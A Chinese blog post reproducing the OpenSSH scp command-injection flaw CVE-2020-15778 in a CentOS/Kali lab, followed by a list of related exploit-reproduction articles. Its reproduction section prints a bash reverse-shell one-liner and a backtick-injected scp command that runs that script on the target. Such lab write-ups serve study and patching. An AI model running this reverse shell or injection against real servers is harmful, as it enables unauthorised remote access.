OpenSSH 命令注入漏洞(CVE-2020-15778)復現
0x00 漏洞介紹
CVE編號:CVE-2020-15778
釋出時間:2020-07-24
危害等級:高危
漏洞版本:<= openssh-8.3p1
漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c檔案存在作業系統命令注入漏洞。該漏洞即使在禁用ssh登入的情況下,但是允許使用scp傳檔案,而且遠端伺服器允許使用反引號(`),可利用scp複製檔案到遠端伺服器時,執行帶有payload的scp命令,從而在後續利用中getshell。
利用條件:知道目標的ssh密碼
0x01 模擬場景
設定iptables策略模擬僅允許使用scp的場景,讓該漏洞在特殊環境下實現命令注入。
0x02 實驗場景部署
靶機環境:Centos 7
滲透機環境:Kali 2019版本
1、檢視ssh版本
ssh -V
測試為漏洞存在版本。
2、測試ssh與scp在正常情況下的使用情況。
可以正常使用。
3、執行ervice iptables status 檢查是否安裝iptables,若已安裝IP tables,可跳過第三步。
(1)安裝iptables
yum install -y iptables
(2)安裝iptables-services
yum install iptables-services
(3)centOS7預設自帶firewalld
先停止firewalld服務 systemctl stop firewalld 禁用firewalld服務 systemctl mask firewalld
(4)檢視現有規則
iptables -L -vn
iptables -F是清空預設規則
iptables -L -n --line-number 顯示規則和相對應的編號
4、在Centos中設定iptables策略,禁用ssh遠端連線,但開放scp。
命令:
service iptables start iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP service iptables save iptables -L -n --line-number
5、測試ssh與scp在已設定iptables策略下的使用情況。
0x03 SSH命令注入漏洞復現
1、在kali建立一個1.sh檔案,並寫入一個反彈shell的bash命令。
bash -i >& /dev/tcp/192.168.207.156/4444 0>&1
2、使用scp命令,把該檔案上傳到靶機的/tmp下
3、在新建的命令列頁面中輸入命令:
4、使用POC,遠端執行命令。
scp 1.sh root@192.168.207.156:'`sh /tmp/1.sh`'
5、可以看到,在輸完密碼後,稍等一會就已經成功反彈了shell,實驗結束。
0x04 漏洞防禦
1、先確保ssh密碼沒有洩露,等一波openssh的新版本吧
2、升級ssh版本
3、等待廠商釋出補丁
相關文章
- PfSense命令注入漏洞分析
- 運維-CVE-2020-15778漏洞修復運維
- PHPMailer遠端命令執行漏洞復現PHPAI
- 程式碼注入漏洞以及修復方法
- Apache漏洞復現Apache
- weblogic 漏洞復現Web
- 笑臉漏洞復現
- xxl-job預設accessToken命令執行漏洞復現
- 網站漏洞檢測 wordpress sql注入漏洞程式碼審計與修復網站SQL
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- 利用漏洞修復漏洞:青藤提供的「Log4j命令注入漏洞(CVE-2021-44228)」【免重啟】線上熱補丁服務現已上線!
- Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)復現OracleWebServer
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- ThinkPHP 5.x 遠端命令執行漏洞分析與復現PHP
- CVE-2017-8464 遠端命令執行漏洞復現
- CVE-2017-8464遠端命令執行漏洞復現
- weblogic ssrf漏洞復現Web
- Tomcat系列漏洞復現Tomcat
- Vulhub WebLogic漏洞復現Web
- 護網漏洞復現(三)
- metinfo sql注入漏洞修復建議與防範辦法SQL
- 【漏洞復現】Redis未授權訪問漏洞Redis
- 靶機練習---通達OA,遠端命令執行漏洞復現
- 思科WebEx線上視訊會議軟體曝命令注入漏洞Web
- 警惕:網件無線路由器曝出命令注入漏洞路由器
- Weblogic-SSRF漏洞復現Web
- nginx目錄穿越漏洞復現Nginx
- 【漏洞復現】Paraluni 安全事件分析事件
- Redis未授權漏洞復現Redis
- XML實體注入漏洞XML
- 程式碼安全測試第五期:OS命令注入漏洞
- 資料庫安全-ElasticSearch漏洞復現資料庫Elasticsearch
- 某小型CMS漏洞復現審計
- DHCP命令執行CVE-2018-1111漏洞復現
- WordPress < 3.6.1 PHP 物件注入漏洞PHP物件
- CNVD-2018-01084 漏洞復現報告(service.cgi 遠端命令執行漏洞)
- NetGear多款路由器遠端命令注入漏洞分析(更新補丁分析)路由器
- PHP檔案包含漏洞(利用phpinfo)復現PHP